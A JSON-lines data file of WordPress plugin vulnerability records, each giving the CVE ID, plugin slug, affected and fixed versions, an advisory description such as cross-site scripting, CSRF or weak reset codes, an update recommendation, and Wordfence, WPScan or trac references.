{"CVE_ID":"CVE-2024-6125","slug":"login-with-phone-number","versionImpact":"1.7.34","versionEndExcluding":"1.7.35","description":"The Login with phone number plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 1.7.34. This is due to the plugin generating too weak a reset code, and the code used to reset the password has no attempt or time limit. This makes it possible for unauthenticated attackers to reset the password of arbitrary users by guessing a 6-digit numeric reset code.","recommendation":"Update to version 1.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/301a67a5-226c-413a-9198-66747d1b1fd3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/301a67a5-226c-413a-9198-66747d1b1fd3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104085\\\/login-with-phone-number#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104085\\\/login-with-phone-number#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12271","slug":"360deg-javascript-viewer","versionImpact":"1.7.29","versionEndExcluding":"1.7.30","description":"The 360 Javascript Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ref\u2019 parameter in all versions up to, and including, 1.7.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.7.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/360deg-javascript-viewer\\\/trunk\\\/includes\\\/class-jsv-360-parser.php#L162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206400\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206400\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12b4e363-248f-469a-a958-0b1ec5c6e37f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12b4e363-248f-469a-a958-0b1ec5c6e37f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13452","slug":"contact-form-by-supsystic","versionImpact":"1.7.29","versionEndExcluding":"1.7.30","description":"The Contact Form by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.29. This is due to missing or incorrect nonce validation on a saveAsCopy function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/tags\\\/1.7.29\\\/modules\\\/forms\\\/models\\\/forms.php#L933\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-by-supsystic\\\/tags\\\/1.7.29\\\/modules\\\/forms\\\/models\\\/forms.php#L933\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267149\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267149\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2dbf510-d99f-4918-8462-66696b68003c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2dbf510-d99f-4918-8462-66696b68003c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4302","slug":"stop-user-enumeration","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Stop User Enumeration WordPress plugin before version 1.7.3 blocks REST API \/wp-json\/wp\/v2\/users\/ requests for non-authorized users. However, this can be bypassed by URL-encoding the API path.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f67d6e-4ffe-4126-ac42-fb23c5017a3e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19f67d6e-4ffe-4126-ac42-fb23c5017a3e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11641","slug":"vikbooking","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The VikBooking Hotel Booking Engine & PMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.2. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to change plugin access privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation allows attackers with subscriber-level privileges and above to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225861\\\/vikbooking\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225861\\\/vikbooking\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb6611d-7a4b-4ca8-b9cc-c156437e89b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb6611d-7a4b-4ca8-b9cc-c156437e89b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3673","slug":"web-directory-free","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8930cb-e176-4406-a43f-a6032471debf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e8930cb-e176-4406-a43f-a6032471debf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4364","slug":"qi-addons-for-elementor","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button widgets in all versions up to, and including, 1.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/061ada09-932f-4d2c-aa9e-c53f1d711c85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/061ada09-932f-4d2c-aa9e-c53f1d711c85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/info-button\\\/class-qiaddonsforelementor-info-button-shortcode.php#L696\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/info-button\\\/class-qiaddonsforelementor-info-button-shortcode.php#L696\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/button\\\/class-qiaddonsforelementor-button-shortcode.php#L1253\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qi-addons-for-elementor\\\/tags\\\/1.7.0\\\/inc\\\/shortcodes\\\/button\\\/class-qiaddonsforelementor-button-shortcode.php#L1253\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096634%40qi-addons-for-elementor%2Ftrunk&old=3092106%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096634%40qi-addons-for-elementor%2Ftrunk&old=3092106%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4887","slug":"qi-addons-for-elementor","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.7.2 via the 'behavior' attributes found in the qi_addons_for_elementor_blog_list shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include remote files on the server, resulting in code execution. Please note that this requires an attacker to create a non-existent directory or target an instance where file_exists won't return false with a non-existent directory in the path, in order to successfully exploit.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284daad9-d31e-4d29-ac15-ba293ba9640d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284daad9-d31e-4d29-ac15-ba293ba9640d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096634\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/admin\\\/helpers\\\/helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096634\\\/qi-addons-for-elementor\\\/trunk\\\/inc\\\/admin\\\/helpers\\\/helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5799","slug":"cm-pop-up-banners","versionImpact":"1.7.2","versionEndExcluding":"1.7.3","description":"The CM Pop-Up Banners for WordPress plugin before 1.7.3 does not sanitise and escape some of its popup fields, which could allow high privilege users such as Contributors to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ee3023a-541c-40e6-8d62-24b4b110633c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ee3023a-541c-40e6-8d62-24b4b110633c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5150","slug":"login-with-phone-number","versionImpact":"1.7.26","versionEndExcluding":"1.7.27","description":"The Login with phone number plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.26. This is due to the 'activation_code' default value is empty, and the not empty check is missing in the 'lwp_ajax_register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user email. The vulnerability is patched in version 1.7.26, but there is an issue in the patch that causes the entire function to not work, and this issue is fixed in version 1.7.27.","recommendation":"Update to version 1.7.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf34eb9f-f6e9-4a7a-8459-c86f9fa3dad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf34eb9f-f6e9-4a7a-8459-c86f9fa3dad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4241\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.7.25\\\/login-with-phonenumber.php#L4241\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090625\\\/login-with-phone-number\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090625\\\/login-with-phone-number\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090754\\\/login-with-phone-number#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090754\\\/login-with-phone-number#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12427","slug":"multi-step-form","versionImpact":"1.7.23","versionEndExcluding":"1.7.24","description":"The Multi Step Form plugin for WordPress is vulnerable to unauthorized limited file upload due to a missing capability check on the fw_upload_file AJAX action in all versions up to, and including, 1.7.23. This makes it possible for unauthenticated attackers to upload limited file types such as images.","recommendation":"Update to version 1.7.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-step-form\\\/tags\\\/1.7.22\\\/includes\\\/lib\\\/msf-shortcode.class.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219723%40multi-step-form&new=3219723%40multi-step-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219723%40multi-step-form&new=3219723%40multi-step-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a31fee-ccc2-4c3b-b198-6cb750188113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0a31fee-ccc2-4c3b-b198-6cb750188113?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3669","slug":"web-directory-free","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Web Directory Free WordPress plugin before 1.7.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c37c9a9-1424-427a-adc7-c2336a47e9cf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c37c9a9-1424-427a-adc7-c2336a47e9cf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13622","slug":"woo-addon-uploads","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The File Uploads Addon for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.1 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain file attachments uploaded by customers.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/includes\\\/class-wau-front-end.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/includes\\\/class-wau-front-end.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/woocommerce-addon-uploads.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-addon-uploads\\\/trunk\\\/woocommerce-addon-uploads.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86bb77-7194-4a8d-b862-6f04d850017b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86bb77-7194-4a8d-b862-6f04d850017b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13395","slug":"threepress","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Threepress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'threepress' shortcode in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.1\\\/threepress.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.1\\\/threepress.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.2\\\/threepress.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threepress\\\/tags\\\/1.7.2\\\/threepress.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7021881-2ce9-4c8b-bcfa-6886cce649d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7021881-2ce9-4c8b-bcfa-6886cce649d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11458","slug":"faq-builder-ays","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The FAQ Builder AYS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ays_faq_tab' parameter in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.0\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.0\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.1\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.1\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.2\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-builder-ays\\\/tags\\\/1.7.2\\\/admin\\\/partials\\\/faq-builder-ays-admin-actions.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c509345b-441f-474d-ad3a-720801859f86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c509345b-441f-474d-ad3a-720801859f86?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5746","slug":"drag-and-drop-file-uploads-wc-pro","versionImpact":"5.0.5","versionEndExcluding":"1.7.2","description":"The Drag and Drop Multiple File Upload (Pro) - WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the dnd_upload_cf7_upload_chunks() function in version 5.0 - 5.0.5 (when bundled with the PrintSpace theme) and all versions up to, and including, 1.7.1 (in the standalone version). This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The execution of PHP is disabled via a .htaccess file but is still possible in certain server configurations.","recommendation":"Update to one of the following versions, or a newer patched version: 1.7.2, 5.0.7","refs":"[{\"url\":\"https:\\\/\\\/www.codedropz.com\\\/woocommerce-drag-drop-multiple-file-upload\\\/\",\"name\":\"https:\\\/\\\/www.codedropz.com\\\/woocommerce-drag-drop-multiple-file-upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c1f625e-4456-45e4-8a7f-809b22edb66b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c1f625e-4456-45e4-8a7f-809b22edb66b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5921","slug":"sureforms","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The SureForms  WordPress plugin before 1.7.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both authenticated and unauthenticated users.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/052fb6cf-274e-468b-a7e0-0e7a1751ec75\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/052fb6cf-274e-468b-a7e0-0e7a1751ec75\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5290","slug":"borderless","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Borderless \u2013 Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L288\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L288\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/assets\\\/scripts\\\/borderless-elementor.min.js#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L433\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L417\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302155\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302155\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4492aede-b68d-46b8-955f-81ebdc875921?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4492aede-b68d-46b8-955f-81ebdc875921?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4605","slug":"breakdance","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The Breakdance plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.7.1 via post meta data. This is due to the plugin storing custom data in metadata without an underscore prefix. This makes it possible for lower privileged users, such as contributors, to edit this data via UI. As a result they can escalate their privileges or execute arbitrary code.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-2-now-available-security-update\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-2-now-available-security-update\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095b23b7-71ab-41eb-b666-73df2e1a7eb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095b23b7-71ab-41eb-b666-73df2e1a7eb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13616","slug":"vikbooking","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b3a2d9-a2e1-43dd-b27a-1ad9d6015c9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b3a2d9-a2e1-43dd-b27a-1ad9d6015c9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
